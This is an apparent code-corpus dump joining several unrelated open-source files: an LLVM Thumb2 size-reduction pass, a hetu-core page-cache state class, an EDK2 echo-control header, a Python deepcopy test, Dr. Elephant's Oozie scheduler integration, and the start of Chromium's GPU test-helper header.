/// UpdateCPSRDef - Scan \p MI for explicit, non-undef definitions of CPSR.
/// Sets \p DefCPSR when any such def exists, and returns the new liveness of
/// CPSR after the instruction (live if a non-dead def was seen, or if it was
/// already live going in).
static bool UpdateCPSRDef(MachineInstr &MI, bool LiveCPSR, bool &DefCPSR) {
  bool LiveDefSeen = false;
  for (const MachineOperand &MO : MI.operands()) {
    if (MO.isReg() && !MO.isUndef() && MO.isDef() && MO.getReg() == ARM::CPSR) {
      DefCPSR = true;
      // Only a def that is not marked dead keeps CPSR live afterwards.
      LiveDefSeen |= !MO.isDead();
    }
  }
  return LiveCPSR || LiveDefSeen;
}
/// UpdateCPSRUse - Scan \p MI for explicit uses of CPSR and return the
/// liveness of CPSR after the instruction: a kill of CPSR ends its live
/// range, otherwise liveness is unchanged.
static bool UpdateCPSRUse(MachineInstr &MI, bool LiveCPSR) {
  for (const MachineOperand &MO : MI.operands()) {
    if (!MO.isReg() || MO.isUndef() || !MO.isUse() || MO.getReg() != ARM::CPSR)
      continue;
    // A use of CPSR is only legal while our tracking says it is live.
    assert(LiveCPSR && "CPSR liveness tracking is wrong!");
    if (MO.isKill())
      return false;
  }
  return LiveCPSR;
}
/// ReduceMI - Dispatch a single instruction to the appropriate reduction
/// strategy based on its entry in the opcode table. Returns true if \p MI
/// was narrowed.
bool Thumb2SizeReduce::ReduceMI(MachineBasicBlock &MBB, MachineInstr *MI,
                                bool LiveCPSR, bool IsSelfLoop) {
  auto OPI = ReduceOpcodeMap.find(MI->getOpcode());
  if (OPI == ReduceOpcodeMap.end())
    return false;
  const ReduceEntry &Entry = ReduceTable[OPI->second];
  // "Special" opcodes have bespoke handling and skip the generic paths.
  if (Entry.Special)
    return ReduceSpecial(MBB, MI, Entry, LiveCPSR, IsSelfLoop);
  // Prefer the 16-bit two-address form; fall back to the general narrow form.
  if (Entry.NarrowOpc2 && ReduceTo2Addr(MBB, MI, Entry, LiveCPSR, IsSelfLoop))
    return true;
  return Entry.NarrowOpc1 && ReduceToNarrow(MBB, MI, Entry, LiveCPSR, IsSelfLoop);
}
/// ReduceMBB - Walk one basic block, tracking CPSR liveness and the latest
/// CPSR-defining instruction, and attempt to narrow each instruction.
/// Records per-block HighLatencyCPSR state so successors visited later in
/// RPO can consult it. Returns true if any instruction was changed.
bool Thumb2SizeReduce::ReduceMBB(MachineBasicBlock &MBB) {
  bool Modified = false;
  // Yes, CPSR could be livein.
  bool LiveCPSR = MBB.isLiveIn(ARM::CPSR);
  MachineInstr *BundleMI = nullptr;
  CPSRDef = nullptr;
  HighLatencyCPSR = false;
  // Check predecessors for the latest CPSRDef.
  for (auto *Pred : MBB.predecessors()) {
    const MBBInfo &PInfo = BlockInfo[Pred->getNumber()];
    if (!PInfo.Visited) {
      // Since blocks are visited in RPO, this must be a back-edge.
      continue;
    }
    if (PInfo.HighLatencyCPSR) {
      HighLatencyCPSR = true;
      break;
    }
  }
  // If this BB loops back to itself, conservatively avoid narrowing the
  // first instruction that does partial flag update.
  bool IsSelfLoop = MBB.isSuccessor(&MBB);
  MachineBasicBlock::instr_iterator MII = MBB.instr_begin(),E = MBB.instr_end();
  MachineBasicBlock::instr_iterator NextMII;
  for (; MII != E; MII = NextMII) {
    NextMII = std::next(MII);
    MachineInstr *MI = &*MII;
    if (MI->isBundle()) {
      BundleMI = MI;
      continue;
    }
    if (MI->isDebugInstr())
      continue;
    LiveCPSR = UpdateCPSRUse(*MI, LiveCPSR);
    // Does NextMII belong to the same bundle as MI?
    bool NextInSameBundle = NextMII != E && NextMII->isBundledWithPred();
    if (ReduceMI(MBB, MI, LiveCPSR, IsSelfLoop)) {
      Modified = true;
      MachineBasicBlock::instr_iterator I = std::prev(NextMII);
      MI = &*I;
      // Removing and reinserting the first instruction in a bundle will break
      // up the bundle. Fix the bundling if it was broken.
      if (NextInSameBundle && !NextMII->isBundledWithPred())
        NextMII->bundleWithPred();
    }
    if (BundleMI && !NextInSameBundle && MI->isInsideBundle()) {
      // FIXME: Since post-ra scheduler operates on bundles, the CPSR kill
      // marker is only on the BUNDLE instruction. Process the BUNDLE
      // instruction as we finish with the bundled instruction to work around
      // the inconsistency.
      if (BundleMI->killsRegister(ARM::CPSR))
        LiveCPSR = false;
      MachineOperand *MO = BundleMI->findRegisterDefOperand(ARM::CPSR);
      if (MO && !MO->isDead())
        LiveCPSR = true;
      MO = BundleMI->findRegisterUseOperand(ARM::CPSR);
      if (MO && !MO->isKill())
        LiveCPSR = true;
    }
    bool DefCPSR = false;
    LiveCPSR = UpdateCPSRDef(*MI, LiveCPSR, DefCPSR);
    if (MI->isCall()) {
      // Calls don't really set CPSR.
      CPSRDef = nullptr;
      HighLatencyCPSR = false;
      IsSelfLoop = false;
    } else if (DefCPSR) {
      // This is the last CPSR defining instruction.
      CPSRDef = MI;
      HighLatencyCPSR = isHighLatencyCPSR(CPSRDef);
      IsSelfLoop = false;
    }
  }
  // Publish this block's state for RPO successors.
  MBBInfo &Info = BlockInfo[MBB.getNumber()];
  Info.HighLatencyCPSR = HighLatencyCPSR;
  Info.Visited = true;
  return Modified;
}
/// runOnMachineFunction - Entry point of the pass: set up subtarget state and
/// narrow instructions in every reachable block, visiting blocks in reverse
/// post-order so predecessor CPSR information is available first.
bool Thumb2SizeReduce::runOnMachineFunction(MachineFunction &MF) {
  if (PredicateFtor && !PredicateFtor(MF.getFunction()))
    return false;
  STI = &static_cast<const ARMSubtarget &>(MF.getSubtarget());
  // Thumb1-only targets have no wide instructions to shrink, and some
  // subtargets explicitly prefer the 32-bit encodings.
  if (STI->isThumb1Only() || STI->prefers32BitThumb())
    return false;
  TII = static_cast<const Thumb2InstrInfo *>(STI->getInstrInfo());
  // Minimizing size implies optimizing for size.
  OptimizeSize = MF.getFunction().hasOptSize();
  MinimizeSize = STI->hasMinSize();
  BlockInfo.clear();
  BlockInfo.resize(MF.getNumBlockIDs());
  // Reverse post-order guarantees each block's predecessors (except
  // back-edges) are processed before the block itself.
  ReversePostOrderTraversal<MachineFunction *> RPOT(&MF);
  bool Modified = false;
  for (MachineBasicBlock *MBB : RPOT)
    Modified |= ReduceMBB(*MBB);
  return Modified;
}
/// createThumb2SizeReductionPass - Returns an instance of the Thumb2 size
/// reduction pass.
/// \param Ftor optional predicate; when non-null, the pass only runs on
/// functions for which it returns true.
FunctionPass *llvm::createThumb2SizeReductionPass(
    std::function<bool(const Function &)> Ftor) {
  return new Thumb2SizeReduce(std::move(Ftor));
}
| 18,487 |
476 | <reponame>tejasvinu/hetu-core
/*
* Copyright (C) 2018-2021. Huawei Technologies Co., Ltd. All rights reserved.
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package io.prestosql.operator;
import io.prestosql.spi.Page;
import io.prestosql.spi.operator.ReuseExchangeOperator;
import io.prestosql.spiller.Spiller;
import java.util.ArrayList;
import java.util.List;
import java.util.Optional;
import java.util.UUID;
import java.util.concurrent.ConcurrentLinkedQueue;
import static io.prestosql.spi.operator.ReuseExchangeOperator.STRATEGY.REUSE_STRATEGY_PRODUCER;
/**
 * Shared bookkeeping for one reuse-exchange table scan mapping id. Holds the
 * cached pages, pages pending spill, spill handle and consumer reference
 * counts exchanged between the producer table scan operator and its consumer
 * scan operators when the reuse-exchange optimization is active.
 */
public class ReuseExchangeTableScanMappingIdState
{
    // Whether this state belongs to the producer or a consumer scan node.
    private ReuseExchangeOperator.STRATEGY strategy;
    // Identifier linking producer and consumers of the same cached scan.
    private UUID reuseTableScanMappingId;
    // Pages currently cached in memory for consumers to read.
    private List<Page> pageCaches;
    // Pages queued to be written to disk by the spiller.
    private List<Page> pagesToSpill;
    private ConcurrentLinkedQueue<String> sourceNodeModifiedIdList;
    // Spill handle; empty until the first spill occurs.
    private Optional<Spiller> spiller;
    private int pagesWritten;
    // Consumers that still have pages left to read.
    private int curConsumerScanNodeRefCount;
    private int totalConsumerScanNodeCount;
    private OperatorContext operatorContext;
    // NOTE(review): public mutable flag, unlike the other private fields;
    // callers appear to toggle it directly.
    public boolean cacheUpdateInProgress;
    public ReuseExchangeTableScanMappingIdState(ReuseExchangeOperator.STRATEGY strategy, UUID reuseTableScanMappingId, OperatorContext operatorContext, int curConsumerScanNodeRefCount)
    {
        this.strategy = strategy;
        this.reuseTableScanMappingId = reuseTableScanMappingId;
        // Consumer counts and the operator context are only tracked on the
        // producer side.
        if (strategy.equals(REUSE_STRATEGY_PRODUCER)) {
            this.operatorContext = operatorContext;
            this.curConsumerScanNodeRefCount = curConsumerScanNodeRefCount;
            this.totalConsumerScanNodeCount = curConsumerScanNodeRefCount;
            pagesWritten = 0;
        }
        pageCaches = new ArrayList<>();
        pagesToSpill = new ArrayList<>();
        sourceNodeModifiedIdList = new ConcurrentLinkedQueue<>();
        spiller = Optional.empty();
        cacheUpdateInProgress = false;
    }
    public ReuseExchangeOperator.STRATEGY getStrategy()
    {
        return strategy;
    }
    public void setStrategy(ReuseExchangeOperator.STRATEGY strategy)
    {
        this.strategy = strategy;
    }
    public UUID getReuseTableScanMappingId()
    {
        return reuseTableScanMappingId;
    }
    public void setReuseTableScanMappingId(UUID reuseTableScanMappingId)
    {
        this.reuseTableScanMappingId = reuseTableScanMappingId;
    }
    public List<Page> getPageCaches()
    {
        return pageCaches;
    }
    public void setPageCaches(List<Page> pageCaches)
    {
        this.pageCaches = pageCaches;
    }
    public List<Page> getPagesToSpill()
    {
        return pagesToSpill;
    }
    public void setPagesToSpill(List<Page> pagesToSpill)
    {
        this.pagesToSpill = pagesToSpill;
    }
    public ConcurrentLinkedQueue<String> getSourceNodeModifiedIdList()
    {
        return sourceNodeModifiedIdList;
    }
    public void setSourceNodeModifiedIdList(ConcurrentLinkedQueue<String> sourceNodeModifiedIdList)
    {
        this.sourceNodeModifiedIdList = sourceNodeModifiedIdList;
    }
    public void addToSourceNodeModifiedIdList(String sourceNodeModifiedId)
    {
        this.sourceNodeModifiedIdList.add(sourceNodeModifiedId);
    }
    public Optional<Spiller> getSpiller()
    {
        return spiller;
    }
    public void setSpiller(Optional<Spiller> spiller)
    {
        this.spiller = spiller;
    }
    public int getPagesWrittenCount()
    {
        return pagesWritten;
    }
    public void setPagesWritten(int pagesWritten)
    {
        this.pagesWritten = pagesWritten;
    }
    public int getCurConsumerScanNodeRefCount()
    {
        return this.curConsumerScanNodeRefCount;
    }
    public void setCurConsumerScanNodeRefCount(int curConsumerScanNodeRefCount)
    {
        this.curConsumerScanNodeRefCount = curConsumerScanNodeRefCount;
    }
    public int getTotalConsumerScanNodeCount()
    {
        return totalConsumerScanNodeCount;
    }
    public void setTotalConsumerScanNodeCount(int totalConsumerScanNodeCount)
    {
        this.totalConsumerScanNodeCount = totalConsumerScanNodeCount;
    }
    public OperatorContext getOperatorContext()
    {
        return operatorContext;
    }
    public void setOperatorContext(OperatorContext operatorContext)
    {
        this.operatorContext = operatorContext;
    }
    public void addPage(Page page)
    {
        // Guard against a caller having set the cache list to null.
        if (this.pageCaches != null) {
            this.pageCaches.add(page);
        }
    }
    public void clearPagesToSpill()
    {
        this.pagesToSpill.clear();
    }
}
| 1,874 |
2,757 | <reponame>CEOALT1/RefindPlusUDK
/** @file
Constants and declarations for the Echo function.
Copyright (c) 2012 - 2014, Intel Corporation. All rights reserved.<BR>
This program and the accompanying materials are licensed and made available
under the terms and conditions of the BSD License which accompanies this
distribution. The full text of the license may be found at
http://opensource.org/licenses/bsd-license.php.
THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
**/
#ifndef _IIO_ECHO_CTRL_H
#define _IIO_ECHO_CTRL_H
#include <sys/termios.h>
__BEGIN_DECLS
/* These constants are assigned values within the Unicode Private Use range.
The value of IIO_ECHO_MIN must be adjusted to ensure that IIO_ECHO_MAX
never exceeds the value of (TtyFunKeyMin - 1).
*/
/* Control codes produced by the interactive-IO echo logic. Values are
   allocated within the Unicode Private Use range starting at TtySpecKeyMin,
   so they can never collide with ordinary input characters; IIO_ECHO_MAX
   must stay below (TtyFunKeyMin - 1) per the note above. */
typedef enum {
  IIO_ECHO_MIN = (TtySpecKeyMin),
  IIO_ECHO_DISCARD = IIO_ECHO_MIN, // Ignore this character completely
  IIO_ECHO_ERASE, // Erase previous character
  IIO_ECHO_KILL, // Kill the entire line
  IIO_ECHO_MAX
} IioEchoCtrl;
__END_DECLS
#endif /* _IIO_ECHO_CTRL_H */
| 490 |
11,868 | from copy import deepcopy
import unittest
from petstore_api.model.mammal import Mammal
from petstore_api.model.triangle import Triangle
class TestCopy(unittest.TestCase):
    """Verify that generated model objects support copy.deepcopy."""

    def setUp(self):
        pass

    def tearDown(self):
        pass

    def _check_deepcopy(self, model):
        # A deep copy must be a distinct object that still compares equal.
        clone = deepcopy(model)
        assert id(clone) != id(model)
        assert clone == model

    def testDeepCopyOneOf(self):
        """test deepcopy"""
        original = deepcopy(Mammal(class_name="whale"))
        self._check_deepcopy(original)

    def testDeepCopyAllOf(self):
        """test deepcopy"""
        self._check_deepcopy(
            Triangle(shape_type="Triangle", triangle_type="EquilateralTriangle", foo="blah"))
        self._check_deepcopy(
            Triangle._new_from_openapi_data(
                shape_type="Triangle", triangle_type="EquilateralTriangle", foo="blah"))
# Allow running this suite directly: python test_copy.py
if __name__ == '__main__':
    unittest.main()
| 386 |
1,318 | /*
* Copyright 2016 LinkedIn Corp.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*/
package com.linkedin.drelephant.schedulers;
import com.linkedin.drelephant.configurations.scheduler.SchedulerConfigurationData;
import com.linkedin.drelephant.util.Utils;
import org.apache.log4j.Logger;
import org.apache.oozie.client.*;
import org.apache.commons.lang.StringUtils;
import java.util.Properties;
/**
* This class provides methods to load information specific to the Oozie scheduler.
*/
public class OozieScheduler implements Scheduler {
  private static final Logger logger = Logger.getLogger(OozieScheduler.class);
  // Property key carrying the Oozie action id on analyzed jobs.
  private static final String OOZIE_ACTION_ID = "oozie.action.id";
  // Scheduler configuration parameter names (looked up in the param map).
  private static final String OOZIE_API_URL = "oozie_api_url";
  private static final String OOZIE_AUTH_OPTION = "oozie_auth_option";
  private static final String OOZIE_JOB_DEF_URL_TEMPLATE = "oozie_job_url_template";
  private static final String OOZIE_JOB_EXEC_URL_TEMPLATE = "oozie_job_exec_url_template";
  private static final String OOZIE_WORKFLOW_DEF_URL_TEMPLATE = "oozie_workflow_url_template";
  private static final String OOZIE_WORKFLOW_EXEC_URL_TEMPLATE = "oozie_workflow_exec_url_template";
  private static final String OOZIE_APP_NAME_UNIQUENESS = "oozie_app_name_uniqueness";
  // When true, app names are assumed unique and used to build stable job ids.
  private boolean appNameUniqueness;
  private String schedulerName;
  // Identifiers and console URLs resolved from the Oozie server.
  private String jobDefId;
  private String jobExecId;
  private String flowExecId;
  private String flowDefId;
  private String jobDefIdUrl;
  private String jobExecIdUrl;
  private String flowExecIdUrl;
  private String flowDefIdUrl;
  // How many parent hops were walked to reach the super parent workflow.
  private int workflowDepth;
  private OozieClient oozieClient;
  // Optional URL templates used when console URLs are not desired.
  private String jobDefUrlTemplate;
  private String jobExecUrlTemplate;
  private String workflowDefUrlTemplate;
  private String workflowExecUrlTemplate;
  private String flowDefName;
  /**
   * Convenience constructor; no pre-built {@link OozieClient} is supplied, so
   * one is created from the scheduler configuration when needed.
   */
  public OozieScheduler(String appId, Properties properties, SchedulerConfigurationData schedulerConfData) {
    this(appId, properties, schedulerConfData, null);
  }
  /**
   * Builds the scheduler info for one analyzed application.
   *
   * @param appId application id (currently unused here)
   * @param properties job configuration; must contain oozie.action.id for any
   *                   Oozie metadata to be resolved
   * @param schedulerConfData scheduler configuration (URL templates, auth, ...)
   * @param oozieClient pre-built client, or null to create one from config
   */
  public OozieScheduler(String appId, Properties properties, SchedulerConfigurationData schedulerConfData, OozieClient oozieClient) {
    schedulerName = schedulerConfData.getSchedulerName();
    if (properties != null && properties.getProperty(OOZIE_ACTION_ID) != null) {
      this.oozieClient = oozieClient == null ? makeOozieClient(schedulerConfData) : oozieClient;
      jobDefUrlTemplate = schedulerConfData.getParamMap().get(OOZIE_JOB_DEF_URL_TEMPLATE);
      jobExecUrlTemplate = schedulerConfData.getParamMap().get(OOZIE_JOB_EXEC_URL_TEMPLATE);
      workflowDefUrlTemplate = schedulerConfData.getParamMap().get(OOZIE_WORKFLOW_DEF_URL_TEMPLATE);
      workflowExecUrlTemplate = schedulerConfData.getParamMap().get(OOZIE_WORKFLOW_EXEC_URL_TEMPLATE);
      String appNameUniquenessStr = schedulerConfData.getParamMap().get(OOZIE_APP_NAME_UNIQUENESS);
      appNameUniqueness = appNameUniquenessStr != null && Boolean.parseBoolean(appNameUniquenessStr);
      loadInfo(properties);
    }
    // Use default value of data type
  }
  /**
   * Resolves workflow, super-parent and URL information from the Oozie server
   * for the action id found in the job properties. Distinguishes
   * coordinator-scheduled workflows from manually submitted ones.
   *
   * @throws RuntimeException if the Oozie server cannot be queried
   */
  private void loadInfo(Properties properties) {
    // 0004167-160629080632562-oozie-oozi-W@some-action
    String actionId = properties.getProperty(OOZIE_ACTION_ID);
    if (actionId.contains("@")) {
      String workflowId = extractId(actionId);
      WorkflowJob workflow;
      try {
        logger.info("Fetching Oozie workflow info for " + workflowId);
        workflow = oozieClient.getJobInfo(workflowId);
        logger.info("Oozie workflow for " + workflowId + ": " + workflow);
        String superParentId = getSuperParentId(workflow);
        logger.info("Oozie super parent for: " + workflowId + ": " + superParentId);
        jobExecId = workflow.getId();
        jobExecIdUrl = workflow.getConsoleUrl();
        jobDefIdUrl = workflow.getConsoleUrl();
        flowExecId = superParentId;
        if (isCoordinatorJob(superParentId)) {
          coordinatedJobInfo(workflow, actionId, superParentId);
        } else {
          manualCommittedJob(workflow, actionId, superParentId);
        }
      } catch (OozieClientException e) {
        throw new RuntimeException("Failed fetching Oozie workflow " + workflowId + " info", e);
      }
    }
  }
  /**
   * Fills flow/job definition ids and URLs for a workflow that was submitted
   * manually (its super parent is itself a workflow, not a coordinator).
   */
  private void manualCommittedJob(WorkflowJob workflow, String actionId, String superParentId) throws OozieClientException {
    logger.info("Oozie workflow " + actionId + " was manually submitted");
    WorkflowJob flowDefWorkflow = oozieClient.getJobInfo(extractId(superParentId));
    flowDefIdUrl = flowDefWorkflow.getConsoleUrl();
    flowExecIdUrl = flowDefWorkflow.getConsoleUrl();
    if (appNameUniqueness) {
      // App names are stable across runs, so use them for definition ids.
      jobDefId = workflow.getAppName() + "-" + extractAction(actionId);
      flowDefId = superParentId;
      flowDefName = flowDefWorkflow.getAppName();
    } else {
      jobDefId = workflow.getId();
      flowDefId = superParentId;
    }
  }
/**
 * Fills in the flow/job definition fields for a workflow whose super parent
 * is an Oozie coordinator (i.e. the job is scheduled).
 *
 * When {@code appNameUniqueness} is enabled, the workflow app name keys the
 * job definition; otherwise a synthetic id built from the coordinator id,
 * the action name and the workflow nesting depth is used.
 */
private void coordinatedJobInfo(WorkflowJob workflow, String actionId, String superParentId) throws OozieClientException {
    logger.info("Oozie workflow " + actionId + " is scheduled with coordinator");
    CoordinatorJob flowDefCoordinator = oozieClient.getCoordJobInfo(extractId(superParentId));
    flowDefIdUrl = flowDefCoordinator.getConsoleUrl();
    flowExecIdUrl = flowDefCoordinator.getConsoleUrl();
    if (appNameUniqueness) {
        jobDefId = workflow.getAppName() + "-" + extractAction(actionId);
        flowDefId = extractId(superParentId);
        flowDefName = flowDefCoordinator.getAppName();
    } else {
        jobDefId = extractId(superParentId) + "-" + extractAction(actionId) + "-" + workflowDepth;
        flowDefId = extractId(superParentId);
    }
}
/** Returns the id portion (text before the first '@') of an "id@action" string. */
private String extractId(String idAndAction) {
    String[] tokens = idAndAction.split("@");
    return tokens[0];
}
/** Returns the action portion (text right after the first '@') of an "id@action" string. */
private String extractAction(String idAndAction) {
    String[] tokens = idAndAction.split("@");
    return tokens[1];
}
/**
 * Walks up the parent chain of the given workflow and returns the id of the
 * top-most ancestor. If a coordinator parent is found the walk stops early
 * and that parent id is returned directly.
 *
 * Side effect: (re)computes {@code workflowDepth} as the number of workflow
 * levels traversed before stopping.
 */
private String getSuperParentId(WorkflowJob workflow) throws OozieClientException {
    WorkflowJob current = workflow;
    workflowDepth = 0;
    while (hasParent(current)) {
        if (isCoordinatorJob(current.getParentId())) {
            return current.getParentId();
        }
        current = oozieClient.getJobInfo(current.getParentId());
        workflowDepth++;
    }
    return current.getId();
}
/** True when the workflow reports a non-null, non-empty parent id. */
private boolean hasParent(WorkflowJob workflow) {
    String parentId = workflow.getParentId();
    return parentId != null && !parentId.isEmpty();
}
/** True when the given id refers to an Oozie coordinator job (id suffix "C"). */
private boolean isCoordinatorJob(String workflowId) {
    if (workflowId == null) {
        return false;
    }
    return extractId(workflowId).endsWith("C");
}
/**
 * Builds an authenticated Oozie client from the scheduler configuration.
 *
 * @throws RuntimeException when the mandatory API URL parameter is missing
 */
private OozieClient makeOozieClient(SchedulerConfigurationData schedulerConfData) {
    String oozieApiUrl = schedulerConfData.getParamMap().get(OOZIE_API_URL);
    String authOption = schedulerConfData.getParamMap().get(OOZIE_AUTH_OPTION);
    if (oozieApiUrl == null) {
        throw new RuntimeException("Missing " + OOZIE_API_URL + " param for Oozie Scheduler");
    }
    return new AuthOozieClient(oozieApiUrl, authOption);
}
/**
 * Resolves the URL to expose for an id: the configured template (with the id
 * substituted) wins, then the console URL reported by Oozie, and finally the
 * bare id with a warning about the missing template parameter.
 */
private String getUrl(String idUrl, String id, String urlTemplate, String propertyName) {
    if (urlTemplate != null) {
        return Utils.formatStringOrNull(urlTemplate, id);
    }
    if (idUrl != null) {
        return idUrl;
    }
    logger.warn("Missing " + propertyName + " param for Oozie Scheduler");
    return id;
}
// ---- Scheduler-data accessors ------------------------------------------

@Override
public String getSchedulerName() {
    return schedulerName;
}

/** True when any of the mandatory scheduler identifiers is missing. */
@Override
public boolean isEmpty() {
    return schedulerName == null || jobDefId == null || jobExecId == null || flowDefId == null || flowExecId == null;
}

@Override
public String getJobDefId() {
    return Utils.formatStringOrNull("%s", jobDefId);
}

@Override
public String getJobExecId() {
    return Utils.formatStringOrNull("%s", jobExecId);
}

/** App-name based id when appNameUniqueness is on, raw flow id otherwise. */
@Override
public String getFlowDefId() {
    return Utils.formatStringOrNull("%s", appNameUniqueness ? flowDefName : flowDefId);
}

@Override
public String getFlowExecId() {
    return Utils.formatStringOrNull("%s", flowExecId);
}

// The *Url getters all share the same fallback chain: configured template,
// then console URL reported by Oozie, then the bare id (see getUrl).

@Override
public String getJobDefUrl() {
    return getUrl(jobDefIdUrl, jobDefId, jobDefUrlTemplate, OOZIE_JOB_DEF_URL_TEMPLATE);
}

@Override
public String getJobExecUrl() {
    return getUrl(jobExecIdUrl, jobExecId, jobExecUrlTemplate, OOZIE_JOB_EXEC_URL_TEMPLATE);
}

@Override
public String getFlowDefUrl() {
    return getUrl(flowDefIdUrl, flowDefId, workflowDefUrlTemplate, OOZIE_WORKFLOW_DEF_URL_TEMPLATE);
}

@Override
public String getFlowExecUrl() {
    return getUrl(flowExecIdUrl, flowExecId, workflowExecUrlTemplate, OOZIE_WORKFLOW_EXEC_URL_TEMPLATE);
}

/** Number of workflow levels between this job and its super parent. */
@Override
public int getWorkflowDepth() {
    return workflowDepth;
}

/** The job name is the job definition id. */
@Override
public String getJobName() {
    return jobDefId;
}
}
| 3,906 |
777 | // Copyright (c) 2012 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#ifndef GPU_COMMAND_BUFFER_SERVICE_TEST_HELPER_H_
#define GPU_COMMAND_BUFFER_SERVICE_TEST_HELPER_H_
#include <stddef.h>
#include <string>
#include <vector>
#include "gpu/command_buffer/common/gles2_cmd_utils.h"
#include "gpu/command_buffer/service/shader_translator.h"
#include "ui/gl/gl_implementation.h"
#include "ui/gl/gl_mock.h"
namespace gpu {
namespace gles2 {
struct DisallowedFeatures;
class Buffer;
class BufferManager;
class FeatureInfo;
class MockErrorState;
class Shader;
class TextureRef;
class TextureManager;
// Shared constants and GL-mock expectation helpers for GLES2 service unit
// tests: canned service-side object ids, fake implementation limits, and
// helpers that install the gl::MockGLInterface expectations required to
// initialize context groups, feature info, texture managers, shaders and
// programs.
class TestHelper {
 public:
  // Service-side ids assigned to the per-target "black" and default textures
  // created during texture manager initialization.
  static const GLuint kServiceBlackTexture2dId = 701;
  static const GLuint kServiceDefaultTexture2dId = 702;
  static const GLuint kServiceBlackTexture3dId = 703;
  static const GLuint kServiceDefaultTexture3dId = 704;
  static const GLuint kServiceBlackTexture2dArrayId = 705;
  static const GLuint kServiceDefaultTexture2dArrayId = 706;
  static const GLuint kServiceBlackTextureCubemapId = 707;
  static const GLuint kServiceDefaultTextureCubemapId = 708;
  static const GLuint kServiceBlackExternalTextureId = 709;
  static const GLuint kServiceDefaultExternalTextureId = 710;
  static const GLuint kServiceBlackRectangleTextureId = 711;
  static const GLuint kServiceDefaultRectangleTextureId = 712;

  // Fake implementation limits reported by the mocked GL context.
  static const GLint kMaxSamples = 4;
  static const GLint kMaxRenderbufferSize = 1024;
  static const GLint kMaxTextureSize = 2048;
  static const GLint kMaxCubeMapTextureSize = 2048;
  static const GLint kMax3DTextureSize = 1024;
  static const GLint kMaxArrayTextureLayers = 256;
  static const GLint kMaxRectangleTextureSize = 64;
  static const GLint kNumVertexAttribs = 16;
  static const GLint kNumTextureUnits = 8;
  static const GLint kMaxTextureImageUnits = 8;
  static const GLint kMaxVertexTextureImageUnits = 2;
  static const GLint kMaxFragmentUniformVectors = 16;
  static const GLint kMaxFragmentUniformComponents =
      kMaxFragmentUniformVectors * 4;
  static const GLint kMaxVaryingVectors = 8;
  static const GLint kMaxVaryingFloats = kMaxVaryingVectors * 4;
  static const GLint kMaxVertexUniformVectors = 128;
  static const GLint kMaxVertexUniformComponents = kMaxVertexUniformVectors * 4;
  static const GLint kMaxVertexOutputComponents = 64;
  static const GLint kMaxFragmentInputComponents = 60;
  static const GLint kMaxProgramTexelOffset = 7;
  static const GLint kMinProgramTexelOffset = -8;
  static const GLint kMaxTransformFeedbackSeparateAttribs = 4;
  static const GLint kMaxUniformBufferBindings = 24;
  static const GLint kUniformBufferOffsetAlignment = 1;

  // Description of one vertex attribute as reported by the mocked program.
  struct AttribInfo {
    const char* name;
    GLint size;
    GLenum type;
    GLint location;
  };

  // Description of one uniform, including the client-side ("fake") location
  // mapping used by the decoder.
  struct UniformInfo {
    const char* name;
    GLint size;
    GLenum type;
    GLint fake_location;
    GLint real_location;
    GLint desired_location;
    const char* good_name;
  };

  // Description of one varying used when linking mock programs.
  struct VaryingInfo {
    const char* name;
    GLint size;
    GLenum type;
    GLint fake_location;
    GLint real_location;
    GLint desired_location;
  };

  // Description of one fragment-shader output variable.
  struct ProgramOutputInfo {
    const char* name;
    GLint size;
    GLenum type;
    GLint color_name;
    GLuint index;
  };

  // Installs the expectations for ContextGroup initialization with the given
  // fake extensions / GL version / context type.
  static void SetupContextGroupInitExpectations(
      ::gl::MockGLInterface* gl,
      const DisallowedFeatures& disallowed_features,
      const char* extensions,
      const char* gl_version,
      ContextType context_type,
      bool bind_generates_resource);

  // Installs the expectations for FeatureInfo initialization.
  static void SetupFeatureInfoInitExpectations(::gl::MockGLInterface* gl,
                                               const char* extensions);
  static void SetupFeatureInfoInitExpectationsWithGLVersion(
      ::gl::MockGLInterface* gl,
      const char* extensions,
      const char* gl_renderer,
      const char* gl_version,
      ContextType context_type);

  // Installs the expectations for TextureManager creation / destruction,
  // covering the default and black textures for every enabled target.
  static void SetupTextureManagerInitExpectations(::gl::MockGLInterface* gl,
                                                  bool is_es3_enabled,
                                                  bool is_es3_capable,
                                                  bool is_desktop_core_profile,
                                                  const char* extensions,
                                                  bool use_default_textures);
  static void SetupTextureManagerDestructionExpectations(
      ::gl::MockGLInterface* gl,
      bool is_es3_enabled,
      bool is_desktop_core_profile,
      const char* extensions,
      bool use_default_textures);

  // Expectations for the glUniform* calls that zero out uniforms.
  static void SetupExpectationsForClearingUniforms(::gl::MockGLInterface* gl,
                                                   UniformInfo* uniforms,
                                                   size_t num_uniforms);

  // Expectations for compiling/linking a mock shader program with the given
  // attributes, uniforms (and optionally varyings and program outputs).
  static void SetupShaderExpectations(::gl::MockGLInterface* gl,
                                      const FeatureInfo* feature_info,
                                      AttribInfo* attribs,
                                      size_t num_attribs,
                                      UniformInfo* uniforms,
                                      size_t num_uniforms,
                                      GLuint service_id);
  static void SetupShaderExpectationsWithVaryings(
      ::gl::MockGLInterface* gl,
      const FeatureInfo* feature_info,
      AttribInfo* attribs,
      size_t num_attribs,
      UniformInfo* uniforms,
      size_t num_uniforms,
      VaryingInfo* varyings,
      size_t num_varyings,
      ProgramOutputInfo* program_outputs,
      size_t num_program_outputs,
      GLuint service_id);
  static void SetupProgramSuccessExpectations(
      ::gl::MockGLInterface* gl,
      const FeatureInfo* feature_info,
      AttribInfo* attribs,
      size_t num_attribs,
      UniformInfo* uniforms,
      size_t num_uniforms,
